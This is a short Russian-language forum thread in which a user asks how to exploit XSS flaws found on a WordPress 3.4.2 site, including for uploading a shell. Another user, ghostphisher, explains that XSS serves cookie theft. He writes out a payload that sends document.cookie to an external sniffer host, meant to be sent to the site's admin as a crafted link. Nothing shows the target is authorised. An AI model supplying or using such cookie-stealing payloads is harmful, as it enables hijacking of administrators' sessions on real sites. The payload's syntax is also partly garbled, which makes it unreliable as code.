Просмотр полной версии : XSS уязвимость ( WordPress )
Здравствуйте! При сканировании сайта на WordPress, была выявлена версия 3.4.2, так-же две уязвимости XSS: WordPress Plupload Unspecified XSS, Cross-Site scripting XSS. Как использовать эти уязвимости для атаки на тестируемый ресурс? ( Проникновение, переправка URL, загрузка shell и тд. )
ghostphisher
24.12.2016, 15:02
Dosia сказал(а):
Здравствуйте! При сканировании сайта на WordPress, была выявлена версия 3.4.2, так-же две уязвимости XSS: WordPress Plupload Unspecified XSS, Cross-Site scripting XSS. Как использовать эти уязвимости для атаки на тестируемый ресурс? ( Проникновение, переправка URL, загрузка shell и тд. )
ХSS подразумевает немного иное, используется для разнообразных атак на компьютеры пользователей с целью их захвата, кражи куки (например админа данного ресурса)
ghostphisher сказал(а):
ХSS подразумевает немного иное, используется для разнообразных атак на компьютеры пользователей с целью их захвата, кражи куки (например админа данного ресурса)
Можно использовать что-то из этих уязвимостей для загрузки shell?
ghostphisher
24.12.2016, 15:14
Dosia сказал(а):
Можно использовать что-то из этих уязвимостей для загрузки shell?
На мой взгляд - нет. Только попробовать провести xss на учетную запись админа
ПС К прочтению рекомендую - XSS атака, а так же поставить себе и поиздеваться на WP =) двиг очень популярный, но основыне ошибки идут в довесках к нему, иногда даже тема может быть уязвима.
ghostphisher сказал(а):
На мой взгляд - нет. Только попробовать провести xss на учетную запись админа
ПС К прочтению рекомендую - XSS атака, а так же поставить себе и поиздеваться на WP =) двиг очень популярный, но основыне ошибки идут в довесках к нему, иногда даже тема может быть уязвима.
А можно поподробнее о xss на админа? Или ссылку на тему )
ghostphisher
24.12.2016, 15:29
Dosia сказал(а):
А можно поподробнее о xss на админа? Или ссылку на тему )
Это значит, что будет сформированна специальная ссылка, которую надо будет дать админую.
Можно подлкючить сниффер куки ---> site.com/post.php?p='>img=new Image();img.src="http://xsssniffer.com/sniff.gif?"+document.cookie;"+document.cookie;
Почитать - тема очень обширная. Первым делом, следует проверить, а есть ли на ренсурсе та самая XSS (на себе в браузере). В вики есть статья
После прочтения уже будет более ясно, каким образом это использовать.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot